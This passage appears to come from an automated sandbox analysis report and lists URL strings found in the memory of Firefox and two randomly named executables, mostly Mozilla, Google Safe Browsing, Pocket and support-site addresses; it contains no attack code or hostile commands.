Source: firefox.exe, 0000001C.00000003.2884308105.000001DEFA2E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/value=label
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comremoveTabsProgressListenerpictureinpicture.settingsaccount-connection
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2UPDATE
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2891825991.000001DEF7090000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967932562.000001D14F003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsresource://gre/modules/TelemetryTimestamps.sys.mjs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001C.00000003.2824146264.000001DEF14A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationFTP
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BDF000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601644924.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2602125787.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601840702.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BDF000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601644924.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2602125787.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601840702.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
